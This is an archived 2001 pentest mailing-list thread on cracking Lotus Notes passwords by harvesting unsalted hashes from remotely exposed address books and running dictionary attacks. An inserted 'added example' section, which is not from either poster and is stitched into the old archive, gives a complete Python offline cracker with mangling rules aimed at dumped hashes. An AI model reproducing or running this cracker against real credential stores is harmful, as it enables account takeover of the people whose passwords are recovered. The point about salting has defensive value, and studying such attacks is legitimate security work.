Re: wanted: a script to try dictionary attacks against NOTES ID files

From: miguel.dilajat_private
Date: Wed Nov 21 2001 - 02:39:13 PST

    Talking of the HTTP password attack, it's easy to get the hash because the
    NAB can be accessed remotely in MANY sites (bad administration), and the
    hashes are not salted in 95+% of the installations (bad administration).
    This way you can copy some hashes, but perhaps you don't have Notes to use
    the @password() function to attack them. If one can write a C (or Perl)
    program to attack them, the attack can be done offline as well.
    My past investigation didn't uncover info about any tools (except sesame)
    to attack the hashing algorithm used, only that it's RSA MD4, without salt by
    default.
    Also, the dictionary attack against the hash using @password() wouldn't help
    with many a password; you'll need mangling rules like Crack5 or John The
    Ripper, or even pure brute force.
    Best regards,
    
    Miguel Dilaj
    
    jjoreat_private on 20/11/2001 19:05:58
    
    To:   pentest_list <pen-testat_private>
    cc:
    Subject:  Re: wanted: a script to try dictionary attacks against NOTES ID files
    
    
    I'm responding to both messages at once.
    
    The notes.id password is logically distinct from the HTTP password. That
    said, many notes users set the same password in both places. The HTTP
    password may be either salted or unsalted depending on whether the
    administrators have configured the server that way.
    
    There are two *easy* ways to attack an HTTP password. Throw a dictionary at
    the @Password(string) function and compare this with the unsalted password
    from the address book. Alternatively, run a dictionary against an httpd and
    attempt to log in that way. Obviously that will generate buckets of log
    messages. I hear that there's a cryptanalysis attack on the
    notes.id+httpd password but you'd have to be smarter than me to make it
    work.
    
    Cracking a .id would be nicer since that may be done offline. In the
    absence of a regular scripted approach you could fake a machine out and
    run something that simulates a user moving the mouse and typing at the
    keyboard. While that'd be a pain and not particularly fast, it'll be faster
    to set up than doing the password checking via the Notes API.
    
    Joshua b. Jore
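
Added example (mine, not code from either poster and not Notes' own @Password()): the offline attack both messages describe, a dictionary run through simple Crack/JtR-style mangling rules and compared against unsalted HTTP password hashes copied from an exposed NAB. Because nothing is salted, each candidate is hashed once and checked against every user at the same time, and two users with the same password fall together. The hash function is a stand-in (MD4 where the local OpenSSL still offers it, MD5 otherwise), and the NAB dump and wordlist are constructed; a real run would need a faithful implementation of the Domino algorithm, which the thread does not give.

```python
import hashlib

# Constructed wordlist; a real run would feed a large dictionary here.
SAMPLE_WORDLIST = ["secret", "password", "notes", "domino"]

# Mangling rules, in the spirit of Crack5 / John the Ripper:
# case variants, reversal, leetspeak, and digit/symbol suffixes.
LEET = str.maketrans("aeios", "43105")
SUFFIXES = ([""] + [str(d) for d in range(10)]
            + [f"{d:02d}" for d in range(100)] + ["!", "1!", "123"])


def notes_like_hash(password: str) -> str:
    """Stand-in for Notes' @Password(): an unsalted hash of the password.

    The thread says the default is unsalted MD4, so MD4 is used when the
    local OpenSSL provides it (it is a legacy algorithm in OpenSSL 3) and
    MD5 otherwise. This is an assumption for illustration only; swap in a
    faithful Domino implementation before comparing against real NAB data.
    """
    try:
        h = hashlib.new("md4")
    except ValueError:
        h = hashlib.md5()
    h.update(password.encode("latin-1"))
    return h.hexdigest().lower()


def mangle(word: str):
    """Yield candidate passwords derived from one dictionary word."""
    variants = [word, word.lower(), word.upper(), word.capitalize(), word[::-1]]
    variants += [v.translate(LEET) for v in variants]
    seen = set()
    for v in variants:
        for s in SUFFIXES:
            cand = v + s
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(nab: dict, wordlist, hash_fn=notes_like_hash) -> dict:
    """Offline dictionary attack against unsalted hashes.

    nab maps user -> hex hash as copied from the address book. With no
    salt, one hash computation per candidate is tested against every
    user at once, so users sharing a password are recovered together.
    Returns {user: recovered_password} for the users that fell.
    """
    pending = {}                      # hash -> [users still uncracked]
    for user, digest in nab.items():
        pending.setdefault(digest.lower(), []).append(user)
    cracked = {}
    for word in wordlist:
        for cand in mangle(word):
            users = pending.pop(hash_fn(cand), None)
            if users:
                for user in users:
                    cracked[user] = cand
                if not pending:
                    return cracked    # everyone cracked, stop early
    return cracked


# Constructed NAB extract: (user, HTTPPassword) pairs. These are produced by
# the stand-in hash above and are NOT real Notes hashes.
SAMPLE_NAB = {
    "alice": notes_like_hash("Secret99"),
    "bob":   notes_like_hash("Secret99"),   # same password as alice
    "carol": notes_like_hash("P455w0rd"),
    "dave":  notes_like_hash("zq8#Wk2p"),   # not reachable from the wordlist
}


def run_demo() -> dict:
    """Run the attack on the constructed sample and return what fell."""
    return crack(SAMPLE_NAB, SAMPLE_WORDLIST)


if __name__ == "__main__":
    for user, pw in run_demo().items():
        print(f"{user}: {pw}")
    print("uncracked:", sorted(set(SAMPLE_NAB) - set(run_demo())))
```

Note that alice and bob, having chosen the same password, are recovered by the same single hash computation; adding a per-user salt is exactly what breaks that shortcut, which is the point the thread makes about the unsalted default.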
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    
    This archive was generated by hypermail 2b30 : Wed Nov 21 2001 - 09:40:40 PST